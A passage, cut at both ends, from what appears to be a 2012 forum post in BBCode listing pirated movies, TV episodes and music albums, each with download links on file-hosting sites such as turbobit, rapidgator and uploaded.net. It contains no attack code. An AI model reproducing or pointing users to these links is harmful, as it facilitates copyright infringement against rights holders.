XviD[/B]\r\n[CODE]http://turbobit.net/ev416rbpgcbw/Wish.You.Were.Here.2012.BRRip.XviD-MeRCuRY.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47464040/Wish.You.Were.Here.2012.BRRip.XviD-MeRCuRY.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/mcoosa90/Wish.You.Were.Here.2012.BRRip.XviD-MeRCuRY.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/y9x6fkhl/Wish.You.Were.Here.2012.BRRip.XviD-MeRCuRY.avi[/CODE]\r\n\r\n[B]The Expatriate 2012 BDRip XviD[/B]\r\n[CODE]http://turbobit.net/4yrpyestw721/The.Expatriate.2012.BDRip.XviD-NOSCREENS.avi.html[/CODE]\r\n\r\n[B]Red Lights 2012 480p BRRip XviD[/B]\r\n[CODE]http://turbobit.net/40nwgmx44hhx/Red.Lights.2012.480p.BRRip.XviD.AC3-PTpOWeR.avi.html[/CODE]\r\n\r\n[B]Klonlar 2012 TR BRRip avi[/B]\r\n[CODE]http://turbobit.net/lirvgmb3bed9/Klonlar.2012.TR.BRRip.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/hs8j5zbf/Klonlar.2012.TR.BRRip.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47464455/Klonlar.2012.TR.BRRip.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/1xxjvlkq/Klonlar.2012.TR.BRRip.avi[/CODE]\r\n\r\n[B]The Woman in Black 2012 TR BRRip XviD avi[/B]\r\n[CODE]http://turbobit.net/fxmbmbf53qa1/The.Woman.in.Black.2012.TR.BRRip.XviD.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47464511/The.Woman.in.Black.2012.TR.BRRip.XviD.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/zpkyk6mk/The.Woman.in.Black.2012.TR.BRRip.XviD.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/ezet338u/The.Woman.in.Black.2012.TR.BRRip.XviD.avi[/CODE]\r\n\r\n[B]The Tall Man 2012 BRRip XviD avi[/B]\r\n[CODE]http://turbobit.net/9qzcuwcegnsv/The.Tall.Man.2012.BRRip.XviD.OpeD.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/yz0hrw3v/The.Tall.Man.2012.BRRip.XviD.OpeD.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47464769/The.Tall.Man.2012.BRRip.XviD.OpeD.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/2xo1qi4o/The.Tall.Man.2012.BRRip.XviD.OpeD.avi[/CODE]\r\n\r\n[B]People Like Us 2012 BRRip XviD[/B]\r\n[CODE]http://turbobit.net/irtkorzs335d/People.Like.Us.2012.BRRip.XviD.AC3-BTRG.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/8p2ps5ra/People.Like.Us.2012.BRRip.XviD.AC3-BTRG.avi[/CODE]\r\n\r\n[B]Escape 2012 DVDRip XviD[/B]\r\n[CODE]http://turbobit.net/fgm5sp6fc8rm/Escape.2012.DVDRip.XviD-IGUANA-www.derinport.in.devrimow.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/hrr10zne/Escape.2012.DVDRip.XviD-IGUANA-www.derinport.in.devrimow.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/0woez2ht/Escape.2012.DVDRip.XviD-IGUANA-www.derinport.in.devrimow.avi[/CODE]\r\n\r\n[B]The Awakening 2011 TR BRRip XviD avi[/B]\r\n[CODE]http://turbobit.net/9awovse5phk4/The.Awakening.2011.TR.BRRip.XviD-OpeD.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/80d2agqw/The.Awakening.2011.TR.BRRip.XviD-OpeD.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47464872/The.Awakening.2011.TR.BRRip.XviD-OpeD.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/vny16lq8/The.Awakening.2011.TR.BRRip.XviD-OpeD.avi[/CODE]\r\n\r\n[B]Hamilton 2012 BRRip XviD TR avi[/B]\r\n[CODE]http://turbobit.net/acemwmbyy0lc/Hamilton.2012.BRRip.XviD.TR.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47465358/Hamilton.2012.BRRip.XviD.TR.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/hekruts9/Hamilton.2012.BRRip.XviD.TR.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/w5e9a48z/Hamilton.2012.BRRip.XviD.TR.avi[/CODE]\r\n\r\n[B]Naked Soldier 2012 hdtv xvd[/B]\r\n[CODE]http://turbobit.net/240ijxc859tv/Naked.Soldier.2012.hdtv.xvd_playnow-www.derinport.in.devrimow.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/3bgukcnn/Naked.Soldier.2012.hdtv.xvd_playnow-www.derinport.in.devrimow.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/zonyw2z3/Naked.Soldier.2012.hdtv.xvd_playnow-www.derinport.in.devrimow.avi[/CODE]\r\n\r\n[B]Mirror Mirror 2012 480p BRRip XviD[/B]\r\n[CODE]http://turbobit.net/roay4y70bys3/Mirror.Mirror.2012.480p.BRRip.XviD-AC3.DuaL.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/6r29xpwr/Mirror.Mirror.2012.480p.BRRip.XviD-AC3.DuaL.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47467780/Mirror.Mirror.2012.480p.BRRip.XviD-AC3.DuaL.avi.html[/CODE]\r\n\r\n[B]The Possesionn 2012 TS Xvid avi[/B]\r\n[CODE]http://turbobit.net/93vsk6zy2b9o/The.Possesionn.2012.TS.Xvid-UnKnOwN.avi.html[/CODE]\r\n\r\n[B]Freelancers 2012 BRRip XviD avi[/B]\r\n[CODE]http://turbobit.net/wjms76n86hzv/Freelancers.2012.BRRip.XviD-playXD.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/my2f9a9e/Freelancers.2012.BRRip.XviD-playXD.avi.html[/CODE]\r\n\r\n[B]General Education 2012 480p BRRip XviD avi[/B]\r\n[CODE]http://turbobit.net/5gvop2o2b48x/General.Education.2012.480p.BRRip.XviD.AC3-PTpOWeR.avi.html[/CODE]\r\n\r\n[B]Goodnight for Justice 2 2012 TR DVDRip XviD[/B]\r\n[CODE]http://turbobit.net/pz0dj8cbvxu6/Goodnight.for.Justice.2.2012.TR.DVDRip.XviD.avi.html[/CODE]\r\n\r\n[B]The Letter 2012 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/p2gjnembowzd/The.Letter.2012.DVDRip.XviD-FiCO.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/ivkdho5j/The.Letter.2012.DVDRip.XviD-FiCO.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47828120/The.Letter.2012.DVDRip.XviD-FiCO.avi.html[/CODE]\r\n\r\n[B]The Campaign 2012 DVDRiP XviD avi[/B]\r\n[CODE]http://turbobit.net/wjg90pzuwxr9/The.Campaign.2012.DVDRiP.XviD.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48203691/The.Campaign.2012.DVDRiP.XviD.avi.html[/CODE]\r\n\r\n[B]The Amazing Spiderman 2012 TS XViD avi[/B]\r\n[CODE]http://turbobit.net/rwbgrgbjcq0l/The.Amazing.Spiderman.2012.TS.XViD.AC3.Hive-CM8.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48205009/The.Amazing.Spiderman.2012.TS.XViD.AC3.Hive-CM8.avi.html[/CODE]\r\n\r\n[B]Grassroots avi[/B]\r\n[CODE]http://turbobit.net/wva1kcrxhjn1/Grassroots.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/i0rmjm63/Grassroots.avi.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48204603/grUnkNOwN.avi.html[/CODE]\r\n\r\n[B]Axed 2012 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/ruzyz1r7cy1q/Axed.2012.DVDRip.XviD.AC3-5.1-AQOS.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/hx5hwiml/Axed.2012.DVDRip.XviD.AC3-5.1-AQOS.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48204198/Axed.2012.DVDRip.XviD.AC3-5.1-AQOS.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/2xtphjq2/Axed.2012.DVDRip.XviD.AC3-5.1-AQOS.avi[/CODE]\r\n\r\n[B]Premium Rush 2012 HDTS XviD avi[/B]\r\n[CODE]http://turbobit.net/isauzbv60f90/Premium.Rush.2012.HDTS.AC3.XviD-RESiSTANCE.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/9exdr1f1/Premium.Rush.2012.HDTS.AC3.XviD-RESiSTANCE.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48205887/Premium.Rush.2012.HDTS.AC3.XviD-RESiSTANCE.avi.html[/CODE]\r\n\r\n[B]The Barrens 2012 BDRiP avi[/B]\r\n[CODE]http://turbobit.net/t5gokf4bpigu/The.Barrens.2012.BDRiP.AC3-5.1.XviD-AXED.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/1nsizf7e/The.Barrens.2012.BDRiP.AC3-5.1.XviD-AXED.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48216458/The.Barrens.2012.BDRiP.AC3-5.1.XviD-AXED.avi.html[/CODE]\r\n\r\n[B]Chained 2012 HDRip avi[/B]\r\n[CODE]http://turbobit.net/0izxw03zbj2z/Chained.2012.L1.HDRip.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/ihlqb3zl/Chained.2012.L1.HDRip.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48216868/Chained.2012.L1.HDRip.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/q23pndgg/Chained.2012.L1.HDRip.avi[/CODE]\r\n\r\n[B]Madagascar 3 Europes Most Wanted 2012 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/35h8fz4mvau5/Madagascar.3.Europes.Most.Wanted.2012.DVDRip.XviD-ALLiANCE.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/vvv5fva2/Madagascar.3.Europes.Most.Wanted.2012.DVDRip.XviD-ALLiANCE.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48212222/Madagascar.3.Europes.Most.Wanted.2012.DVDRip.XviD-ALLiANCE.avi.html[/CODE]\r\n\r\n[B]Butter 2012 DVDSCR XviD avi[/B]\r\n[CODE]http://turbobit.net/7jayql8etafx/Butter.2012.DVDSCR.XviD-PSEUDO.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/4n5khufu/Butter.2012.DVDSCR.XviD-PSEUDO.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/o4l4szg6/Butter.2012.DVDSCR.XviD-PSEUDO.avi[/CODE]\r\n\r\n[B]Victim 2012 DVDRiP XviD avi[/B]\r\n[CODE]http://turbobit.net/hf7jvadwj0if/Victim.2012.DVDRiP.XviD-PSEUDO.avi.html[/CODE]\r\n\r\n[B]Deep In The Heart 2012 DVDRIP XVID avi[/B]\r\n[CODE]http://turbobit.net/6sjqlv06kern/Deep.In.The.Heart.2012.DVDRIP.XVID.AC3.5.1-26K.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/bjwg9p2z/Deep.In.The.Heart.2012.DVDRIP.XVID.AC3.5.1-26K.avi.html[/CODE]\r\n\r\n[B]Chernobyl Diaries 2012 REPACK DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/45r7pjkpry3v/Chernobyl.Diaries.2012.REPACK.DVDRip.XviD-FiCO.avi.html[/CODE]\r\n\r\n[B]The Courier 2012 BRRip XviD avi[/B]\r\n[CODE]http://turbobit.net/9ml98kuj86gq/The.Courier.2012.PLSUBBED.BRRip.XviD-BiDA.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/mt2le5ut/The.Courier.2012.PLSUBBED.BRRip.XviD-BiDA.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/rctut1sl/The.Courier.2012.PLSUBBED.BRRip.XviD-BiDA.avi[/CODE]\r\n\r\n[B]Bindlestiffs 2012 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/2is8unt1gklj/Bindlestiffs.2012.DVDRip.XviD-VoMiT.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/hobv0vmg/Bindlestiffs.2012.DVDRip.XviD-VoMiT.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/n463kim9/Bindlestiffs.2012.DVDRip.XviD-VoMiT.avi[/CODE]\r\n\r\n[B]Changing The Game 2012 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/1n3if4vxj9kr/Changing.The.Game.2012.DVDRip.XviD-VoMiT.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/fp5ewh4z/Changing.The.Game.2012.DVDRip.XviD-VoMiT.avi.html[/CODE]\r\n\r\n[B]Storage 24 2012 DVDRip x264 mp4[/B]\r\n[CODE]http://turbobit.net/bjltev32cm8u/Storage.24.2012.DVDRip.x264.AAC.mp4.html[/CODE]\r\n[CODE]http://freakshare.com/files/wffhviwp/Storage.24.2012.DVDRip.x264.AAC.mp4.html[/CODE]\r\n\r\n[B]Eden 2012 DVDRip Xvid avi[/B]\r\n[CODE]http://turbobit.net/hc4tgbpznr98/Eden_2012_DVDRip_Xvid_AC3_Legend-Rg.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/73mgj93o/Eden_2012_DVDRip_Xvid_AC3_Legend-Rg.avi.html[/CODE]\r\n\r\n[B]Big Top Scooby Doo 2012 DVDRip XviD avi[/B]\r\n[CODE]http://freakshare.com/files/9ng0ik6j/Big.Top.Scooby.Doo.2012.DVDRip.XviD-4PlayHD.avi.html[/CODE]\r\n[CODE]http://turbobit.net/gwww8qluxzjv/Big.Top.Scooby.Doo.2012.DVDRip.XviD-4PlayHD.avi.html[/CODE]\r\n\r\n[B]Four Horsemen 2012 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/cmuyemodpjwx/Four.Horsemen.2012.DVDRip.XviD.AC3-MAJESTiC.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/1e2mdn4n/Four.Horsemen.2012.DVDRip.XviD.AC3-MAJESTiC.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/gbj6mhlq/Four.Horsemen.2012.DVDRip.XviD.AC3-MAJESTiC.avi[/CODE]\r\n\r\n[B]Battlefield America 2012 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/cav2vq5h1hjp/Battlefield.America.2012.DVDRip.XviD-PTpOWeR.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/xi81zi5g/Battlefield.America.2012.DVDRip.XviD-PTpOWeR.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/a91uvz5i/Battlefield.America.2012.DVDRip.XviD-PTpOWeR.avi[/CODE]\r\n\r\n[B]Monster High Ghouls Rule 2012 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/b9chdwyw400i/Monster.High.Ghouls.Rule.2012.DVDRip.XviD-VoMiT.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/2jzf0ak9/Monster.High.Ghouls.Rule.2012.DVDRip.XviD-VoMiT.avi.html[/CODE]\r\n\r\n[B]Werewolf The Beast Amon Us 2012 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/07bp7fykiub2/Werewolf.The.Beast.Among.Us.2012.DVDRip.XviD-PTpOWeR.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/mh4si6ai/Werewolf.The.Beast.Among.Us.2012.DVDRip.XviD-PTpOWeR.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/r8ohprb5/Werewolf.The.Beast.Among.Us.2012.DVDRip.XviD-PTpOWeR.avi[/CODE]\r\n\r\n[B]Baring It All 2011 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/8jwhfflhuiml/Baring.It.All.2011.DVDRip.XviD-NOSCREENS.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/s4ffhgpn/Baring.It.All.2011.DVDRip.XviD-NOSCREENS.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/fd3h28b1/Baring.It.All.2011.DVDRip.XviD-NOSCREENS.avi[/CODE]\r\n\r\n[B]Mad Buddies 2012 DVDRip X264 rar[/B]\r\n[CODE]http://turbobit.net/28cy7igxpmwq/Mad.Buddies.2012.DVDRip.X264-NoGRP.rar.html[/CODE]\r\n[CODE]http://freakshare.com/files/5emlcrn2/Mad.Buddies.2012.DVDRip.X264-NoGRP.rar.html[/CODE]\r\n[CODE]http://uploaded.net/file/tn067awv/Mad.Buddies.2012.DVDRip.X264-NoGRP.rar[/CODE]\r\n\r\n[B]Deer Crossing 2012 DVDRiP x264 mkv[/B]\r\n[CODE]http://turbobit.net/gg1tgbq125m4/Deer.Crossing.2012.DVDRiP.x264-NoGRP.mkv.html[/CODE]\r\n[CODE]http://freakshare.com/files/zwa2x3c8/Deer.Crossing.2012.DVDRiP.x264-NoGRP.mkv.html[/CODE]\r\n\r\n[B]We Are Legion 2012 DVDRip x264 mkv[/B]\r\n[CODE]http://turbobit.net/0ju5wsp5yhem/We.Are.Legion.2012.DVDRip.x264.mkv.html[/CODE]\r\n[CODE]http://freakshare.com/files/xvgs9rt7/We.Are.Legion.2012.DVDRip.x264.mkv.html[/CODE]\r\n[CODE]http://uploaded.net/file/k2u69cez/We.Are.Legion.2012.DVDRip.x264.mkv[/CODE]\r\n\r\n[B]Moving Day 2012 DVDRip XviD avi[/B]\r\n[CODE]http://turbobit.net/kahqqykbeyhn/Moving.Day.2012.DVDRip.XviD-PROJECT_X.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/r3qhrrms/Moving.Day.2012.DVDRip.XviD-PROJECT_X.avi.html[/CODE]\r\n\r\n[B]Terror Of Dracula 2012 DVDRip Xvid avi[/B]\r\n[CODE]http://turbobit.net/h7sctpe8dux1/Terror.Of.Dracula.2012.DVDRip.Xvid-UnKnOwN.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/hgr3lewa/Terror.Of.Dracula.2012.DVDRip.Xvid-UnKnOwN.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/nhbh9s0a/Terror.Of.Dracula.2012.DVDRip.Xvid-UnKnOwN.avi[/CODE]\r\n\r\n[B]Nature Calls 2012 HDRiP XviD avi[/B]\r\n[CODE]http://turbobit.net/ae7wfuep499z/Nature.Calls.2012.HDRiP.AC3-2.0.XviD-AXED.avi.html[/CODE]\r\n\r\n[B]Pusher 2012 HDRiP XviD avi[/B]\r\n[CODE]http://turbobit.net/2c75havzv1hm/Pusher.2012.HDRiP.AC3-2.0.XviD-AXED.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/33m5cuo4/Pusher.2012.HDRiP.AC3-2.0.XviD-AXED.avi.html[/CODE]\r\n\r\n\r\n[B]Alphabeat - Express Non Stop iTunes Version[/B]\r\n[CODE]http://turbobit.net/rhipjv8qb7o7/Alphabeat-Express_Non-Stop_iTunes_Version.rar.html[/CODE]\r\n[CODE]http://freakshare.com/files/xo4dgynl/Alphabeat-Express_Non-Stop_iTunes_Version.rar.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48200694/Alphabeat-Express_Non-Stop_iTunes_Version.rar.html[/CODE]\r\n[CODE]http://uploaded.net/file/erqimvu4/Alphabeat-Express_Non-Stop_iTunes_Version.rar[/CODE]\r\n\r\n[B]Faith - RnB Divas 2012[/B]\r\n[CODE]http://turbobit.net/mlbpantw8j94/Faith-RnB-Divas..rar.html[/CODE]\r\n[CODE]http://freakshare.com/files/lnvvhi3h/Faith-WHOA.rar.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48198487/Faith-WHOA.rar.html[/CODE]\r\n[CODE]http://uploaded.net/file/7bgbhzsb/Faith-WHOA.rar[/CODE]\r\n\r\n[B]Dokken - Broken Bones 2012[/B]\r\n[CODE]http://turbobit.net/vb0gb1kptjct/Dokken-Broken_Bones-WEB-2012-wAx.rar.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48198142/Dokken-Broken_Bones-WEB-2012-wAx.rar.html[/CODE]\r\n\r\n[B]Tori Amos-Gold Dust (iTunes Deluxe Version) 2012[/B]\r\n[CODE]http://turbobit.net/r45jhbs7srgz/Tori_Amos-Gold_Dust_(iTunes_Deluxe_Version)-2012.rar.html[/CODE]\r\n[CODE]http://freakshare.com/files/5rn997ya/Tori_Amos-Gold_Dust_-28iTunes_Deluxe_Version-29-2012.rar.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48197371/Tori_Amos-Gold_Dust_(iTunes_Deluxe_Version)-2012.rar.html[/CODE]\r\n[CODE]http://uploaded.net/file/nzfozdi6/Tori_Amos-Gold_Dust_%28iTunes_Deluxe_Version%29-2012.rar[/CODE]\r\n\r\n[B]Ellie Goulding - Halcyon 2012[/B]\r\n[CODE]http://turbobit.net/mkdeqyp0qzaj/Ellie_Goulding-Halcyon-2012-pLAN9.rar.html[/CODE]\r\n[CODE]http://freakshare.com/files/mtol2vwa/Ellie_Goulding-Halcyon-2012-pLAN9.rar.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48197091/Ellie_Goulding-Halcyon-2012-pLAN9.rar.html[/CODE]\r\n[CODE]http://uploaded.net/file/rffk0u41/Ellie_Goulding-Halcyon-2012-pLAN9.rar[/CODE]\r\n\r\n\r\n\r\n[B]Shameless 10x06 hdtv x264[/B]\r\n[CODE]http://turbobit.net/6i6idtd8mjo3/Shameless.10x06.hdtv_x264-fov.mp4.html[/CODE]\r\n[CODE]http://freakshare.com/files/kd4qnl3c/Shameless.10x06.hdtv_x264-fov.mp4.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48182678/shameless.10x06.hdtv_x264-fov.mp4.html[/CODE]\r\n\r\n[B]Sons of Anarchy S05E04 HDTV XviD-AFG[/B]\r\n[CODE]http://turbobit.net/3pspz2bkiuhs/Sons.of.Anarchy.S05E04.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48179699/Sons.of.Anarchy.S05E04.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/y4ytqrx1/Sons.of.Anarchy.S05E04.HDTV.XviD-AFG.avi[/CODE]\r\n\r\n[B]How I Met Your Mother S08E02 HDTV XviD[/B]\r\n[CODE]http://turbobit.net/e182lot9nak6/How.I.Met.Your.Mother.S08E02.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/ygjjzigb/How.I.Met.Your.Mother.S08E02.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48179546/How.I.Met.Your.Mother.S08E02.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/l0srwjv6/How.I.Met.Your.Mother.S08E02.HDTV.XviD-AFG.avi[/CODE]\r\n\r\n[B]Supernatural 801.hdtv-lol[/B]\r\n[CODE]http://turbobit.net/mst0wlbg0gfj/Supernatural.801.hdtv-lol.mp4.html[/CODE]\r\n[CODE]http://freakshare.com/files/u59jzagy/supernatural.801.hdtv-lol.mp4.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48180277/supernatural.801.hdtv-lol.mp4.html[/CODE]\r\n[CODE]http://uploaded.net/file/x4wyn1tx/supernatural.801.hdtv-lol.mp4[/CODE]\r\n\r\n[B]New Girl S02E03 720p HDTV X264[/B]\r\n[CODE]http://turbobit.net/4dc27gezduss/New.Girl.S02E03.720p.HDTV.X264-DIMENSION.mkv.html[/CODE]\r\n[CODE]http://freakshare.com/files/s76b7da3/New.Girl.S02E03.720p.HDTV.X264-DIMENSION.mkv.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48181004/New.Girl.S02E03.720p.HDTV.X264-DIMENSION.mkv.html[/CODE]\r\n[CODE]http://uploaded.net/file/hrvybdr7/New.Girl.S02E03.720p.HDTV.X264-DIMENSION.mkv[/CODE]\r\n\r\n[B]Dexter S07E01[/B]\r\n[CODE]http://turbobit.net/mjseu2uajgbq/Dexter.S07E01.rus.LostFilm_igoryk06.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48181311/Dexter.S07E01.rus.LostFilm_igoryk06.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/9pmx4cwx/Dexter.S07E01.rus.LostFilm_igoryk06.avi[/CODE]\r\n\r\n[B]NCIS S10E02 HDTV XviD-AFG avi[/B]\r\n[CODE]http://turbobit.net/kjm4nz8gbxiv/NCIS.S10E02.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/t0t74xtb/NCIS.S10E02.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48180825/NCIS.S10E02.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/wvi0r2t8/NCIS.S10E02.HDTV.XviD-AFG.avi[/CODE]\r\n\r\n[B]Hart of Dixie S02E01 HDTV XviD-AFG[/B]\r\n[CODE]http://turbobit.net/9fsc7m6x8ybx/Hart.of.Dixie.S02E01.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48180984/Hart.of.Dixie.S02E01.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/d85pvxub/Hart.of.Dixie.S02E01.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/tjw4st64/Hart.of.Dixie.S02E01.HDTV.XviD-AFG.avi[/CODE]\r\n\r\n[B]Survivor S25E03 HDTV XviD-AFG[/B]\r\n[CODE]http://turbobit.net/6ygwkc2rxgwz/Survivor.S25E03.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/ubx4hl4a/Survivor.S25E03.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48182359/Survivor.S25E03.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/skn6jo8n/Survivor.S25E03.HDTV.XviD-AFG.avi[/CODE]\r\n\r\n[B]Anima Practice S01E03 HDTV XviD-AFG[/B]\r\n[CODE]http://turbobit.net/5xbb71jrkvhk/Animal.Practice.S01E03.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/yyjt5xno/Animal.Practice.S01E03.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48182040/Animal.Practice.S01E03.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/7819m64v/Animal.Practice.S01E03.HDTV.XviD-AFG.avi[/CODE]\r\n\r\n[B]The Middle S04E03 HDTV XviD-AFG[/B]\r\n[CODE]http://turbobit.net/7txf6wyx03u2/The.Middle.S04E03.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://rapidgator.net/file/48182183/The.Middle.S04E03.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://freakshare.com/files/bcu1vqv4/The.Middle.S04E03.HDTV.XviD-AFG.avi.html[/CODE]\r\n[CODE]http://uploaded.net/file/ojzuryrp/The.Middle.S04E03.HDTV.XviD-AFG.avi[/CODE]\r\n\r\n\r\n[B]The Beach Boys-50 Big Ones iTunes Version-2012[/B]\r\n[CODE]http://turbobit.net/74skzmtis0ae/The_Beach_Boys-50_Big_Ones_iTunes_Version-2012.rar.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47232642/The_Beach_Boys-50_Big_Ones_iTunes_Version-2012.rar.html[/CODE]\r\n[CODE]http://freakshare.com/files/6cr5hcr6/The_Beach_Boys-50_Big_Ones_iTunes_Version-2012.rar.html[/CODE]\r\n[CODE]http://uploaded.net/file/t1e4yvai/The_Beach_Boys-50_Big_Ones_iTunes_Version-2012.rar[/CODE]\r\n\r\n[B]Papa Roach-The Connection 2012[/B]\r\n[CODE]http://turbobit.net/qbj6kclflq5o/Papa_Roach-The_Connection-2012-FiH.zip.html[/CODE]\r\n\r\n[B]Band of Horses-Mirage Rock-iTunes Version-2012[/B]\r\n[CODE]http://turbobit.net/ckxfycyg84pm/Band.of.Horses-Mirage.Rock-iTunes.Version-2012.rar.html[/CODE]\r\n[CODE]http://freakshare.com/files/fqsmr2fa/Band.of.Horses-Mirage.Rock-iTunes.Version-2012.rar.html[/CODE]\r\n\r\n[B]Dragonette - Bodyparts iTunes Bonus Track Version[/B]\r\n[CODE]http://turbobit.net/5sdtok4sflaa/Dragonette-Bodyparts_iTunes_Bonus_Track_Version.zip.html[/CODE]\r\n[CODE]http://rapidgator.net/file/47232896/Dragonette-Bodyparts_iTunes_Bonus_Track_Version.zip.html[/CODE]\r\n[CODE]http://freakshare.com/files/cr2nfh7t/Dragonette-Bodyparts_iTunes_Bonus_Track_Version.zip.html[/CODE]\r\n\r\n[B]Green Day Uno 2012[/B]\r\n[CODE]http://turbobit.net/rcegywtdzi1g/Green.Day.Uno.2012.rar.html[/CODE]\r\n[CODE]http://uploaded.net/file/c8ai1zp4/Green.Day.Uno.2012.rar[/CODE]\r\n[CODE]http://freakshare.com/files/1uoicapg/Green.Day.Uno.2012.rar.html[/CODE]\r\n\r\n\r\n[B]Christina Aguilera - Your Body[/B]\r\n[CODE]http://turbobit.net/a3jcxayq07n1/Christina Aguilera - Your 